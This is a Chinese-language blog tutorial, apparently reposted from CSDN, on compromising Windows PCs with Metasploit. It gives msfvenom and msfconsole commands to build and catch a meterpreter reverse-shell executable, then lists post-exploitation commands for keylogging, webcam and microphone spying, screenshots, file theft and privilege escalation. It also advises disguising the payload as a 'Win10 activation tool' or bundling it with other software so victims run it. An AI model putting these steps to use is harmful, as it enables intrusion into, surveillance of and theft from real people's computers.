怎么样渗透别人的电脑(Kali利用msf渗透Windows电脑(超详细))
前言
最近整理了一些奇安信&华为&深信服大佬的课件资料+大厂面试课题,想要的可以私信自取,无偿赠送给粉丝朋友~
一、什么是msf
msfvenomaMetasploitstandalonepayloadgenerator,Alsoareplacementformsfpayloadandmsfencode.是用来生成后门的软件。
MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。
演示环境
使用Kali2021.3进行演示操作
目标靶机:Win10专业版
软件:msfvenom、msfconsole(Kali系统内置)
二、渗透流程
1.进入管理员模式
命令:sudosu
解释:不在管理员模式下运行可能会有权限不够的提示,为了避免命令执行失败,在管理员下运行以下命令
2.生成可执行文件
命令:msfvenom-pwindows/meterpreter/reverse_tcpLHOST=<本地ip>LPORT=<本地端口号>–fexe–o<文件名>.exe
解释:本地ip写自己Kali的IP地址,用ifconfig就能查看自己Kali的IP地址
本地端口自己随便设置一个没有被占用的端口号,如果端口号被占用那么文件会生成失败,换一个端口号就性
文件名可以随便写自己喜欢的名字,比如写Win10激活工具,可能更容易让目标主机上钩
当然MSF也可以用来渗透手机、mac、Linux等
接下来运行命令生成文件
默认生成的文件在根目录下
把刚才生成的文件放到目标靶机Win10系统中
3.运行msfconsole命令
命令:msfconsole
4.配置参数
(1)命令:useexploit/multi/handler(选择模块)
(2)命令:setpayloadwindows/meterpreter/reverse_tcp(选择攻击模块)
(3)命令:setLhOST192.168.32.1(填写自己主机的IP地址)
(4)命令:setlport1111(填写刚才生成文件时的端口号)
(5)命令:showoptions(查看设置参数)
(6)命令:exploit-z-j(后台执行)
5.在靶机打开可执行文件
我们这里也可以把这个程序伪装一下,把他的图标改一下,或者把它捆绑在某些软件上面,当用户打开就自动安装到对方电脑上面
6.查看用户
(1)命令:sessions(查看上钩的用户)
(2)命令:sessions-i1(选择需要攻击的用户,这里选择第1个
三、meterpreter渗透靶机的命令1.监控靶机电脑屏幕
命令:runvnc-i
2.更多命令
cmd指令:
cat读取文件内容到屏幕
cd更改目录
checksum检索文件的校验和
cp将源复制到目标
del删除指定文件
dir列出文件(ls的别名)
下载下载文件或目录
编辑编辑文件
getlwd打印本地工作目录
getwd打印工作目录
lcd更改本地工作目录
lls列出本地文件
lpwd打印本地工作目录
ls列出文件
mkdir创建目录
mv将源移动到目标
pwd打印工作目录
rm删除指定文件
rmdir删除目录
search搜索文件
show_mount列出所有挂载点/逻辑驱动器
upload上传文件或目录
pkill按名称终止进程
meterpreter命令:
keyscan_start开始捕获击键(开始键盘记录)
keyscan_dump转储按键缓冲(下载键盘记录)
keyscan_stop停止捕获击键(停止键盘记录)
record_micX秒从默认的麦克风record_mic音频记录(音频录制)
webcam_chat开始视频聊天(视频,对方会有弹窗)
webcam_list单摄像头(查看摄像头列表)
webcam_snap采取快照从指定的摄像头(摄像头拍摄一张照片)
webcam_stream播放视频流从指定的摄像头(开启摄像头监控)
enumdesktops列出所有可访问的桌面和窗口站(窗体列表)
getdesktop得到当前的Meterpreter桌面
reboot重新启动远程计算机
shutdown关闭远程计算机
shell放入系统命令shell
enumdesktops列出所有可访问的桌面和窗口站
getdesktop获取当前的meterpreter桌面
idletime返回远程用户空闲的秒数
keyboard_send发送击键
keyevent发送按键事件
keyscan_dump转储击键缓冲区
keyscan_start开始捕获击键
keyscan_stop停止捕获击键
mouse发送鼠标事件
screenshare实时观看远程用户桌面
screenshot抓取交互式桌面的屏幕截图
setdesktop更改Meterpreters当前桌面
uictl控制一些用户界面组件
record_mic从默认麦克风录制音频X秒
webcam_chat开始视频聊天
webcam_list列出网络摄像头
webcam_snap从指定的网络摄像头拍摄快照
webcam_stream播放来自指定网络摄像头的视频流
play在目标系统上播放波形音频文件(.wav)
getsystem尝试将您的权限提升到本地系统的权限
execute-fnotepad打开记事本
————————————————
版权声明:本文为CSDN博主「HonkerG」的原创文章
原文链接:https://blog.csdn.net/RFZ_322/article/details/123367668